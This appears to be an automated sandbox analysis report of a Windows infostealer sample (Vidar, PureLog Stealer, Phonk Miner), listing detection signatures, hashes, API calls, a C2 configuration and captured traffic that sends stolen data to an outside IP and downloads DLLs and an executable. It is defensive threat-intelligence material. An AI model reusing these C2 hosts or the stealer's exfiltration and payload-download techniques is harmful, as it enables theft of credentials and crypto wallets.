Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe
Analysis ID:	1427675
MD5:	98fa9d5bea93312c32be83bf43d6a47b
SHA1:	bbb33093f8475548308840af9aaf839f02668deb
SHA256:	14d6115881dcd0df5a9fddef6e72547b797b004261602b1a618d610fc04de40a
Tags:	exe
Infos:

Detection

Phonk Miner, PureLog Stealer, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Phonk Miner

Yara detected PureLog Stealer

Yara detected Vidar

Yara detected Vidar stealer

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

High number of junk calls founds (likely related to sandbox DOS / API hammering)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

PE file does not import any functions

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Avira: detected

Found malware configuration

Source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\CAFIJKFHIJ.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe	ReversingLabs: Detection: 66%

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

ReversingLabs: Detection: 68%

Machine Learning detection for dropped file

Source: C:\ProgramData\CAFIJKFHIJ.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411720 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	3_2_00411720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_00406FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat,	3_2_00409230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00406F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6C806C80

Bitcoin Miner

Yara detected Phonk Miner

Source: Yara match	File source: 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CAFIJKFHIJ.exe PID: 5744, type: MEMORYSTR

Uses 32bit PE files

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49754 version: TLS 1.2

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdbSHA256@ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdbSHA256$ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdbSHA256 source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source:	Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe	Code function: 0_2_00F6A7B3 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00F6A7B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040B030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_004011E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	3_2_004164A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00417550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	3_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	3_2_00417140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040A980

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,

3_2_004168E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199673019888

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 162.19.138.79 162.19.138.79
Source: Joe Sandbox View	IP Address: 23.76.43.59 23.76.43.59

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEHUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDGUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 7661Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBAUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGIUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /Soft123.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: centrosmissextensions.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Content-Length: 331Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: unknown	TCP traffic detected without corresponding DNS query: 65.109.242.73

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00404500 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

3_2_00404500

Source: global traffic	HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqln.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0Host: 65.109.242.73Cache-Control: no-cache
